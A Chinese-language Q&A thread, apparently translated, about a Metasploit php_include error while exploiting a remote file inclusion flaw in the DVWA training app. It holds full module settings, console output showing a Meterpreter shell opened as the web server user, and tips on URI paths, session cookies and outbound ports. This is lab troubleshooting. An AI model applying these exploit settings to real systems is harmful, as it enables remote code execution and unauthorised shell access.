Metasploit php_include'nil：NilClass的未定义方法`remove_resource'

Question

我正在尝试利用dvwa文件包含漏洞。 我指的是本教程： http ://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter

当我运行'exploit'时，出现以下错误：[-] Exploit失败：nil：NilClass的未定义方法`remove_resource'

我设置的选项：

msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

   Name      Current Setting                                                           Required  Description
   ----      ---------------                                                           --------  -----------
   HEADERS                                                                             no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   PATH      /                                                                         yes       The base directory to prepend to the URL to try
   PHPRFIDB  /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /dvwa/vulnerabilities/fi/?page=XXpathXX                                   no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                                            no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                                             no        Use a proxy chain
   RHOST     172.16.246.131                                                            yes       The target address
   RPORT     80                                                                        yes       The target port
   SRVHOST   0.0.0.0                                                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080                                                                      yes       The local port to listen on.
   SSLCert                                                                             no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                                             no        The URI to use for this exploit (default is random)
   VHOST                                                                               no        HTTP server virtual host


Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.246.131   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(php_include) > run

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*]  Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

感谢帮助！

Answer 1

成功利用漏洞后，似乎还会出现此错误：

msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.1.2:443 
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

meterpreter > getuid
Server username: apache (48)

确保正确设置了PATH和PHPURI设置。 您可能需要它们如下：

set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX

与Wireshark确认URL是否按预期发送。

另外，可能是某些出站端口被阻止，因此请尝试使用不同的值。

在DVWA的特定情况下，您将需要使用HEADERS参数传递会话cookie。 从登录的浏览器会话中获取此信息，然后进行如下设置：

set HEADERS cookie=PHPSESSIONID=....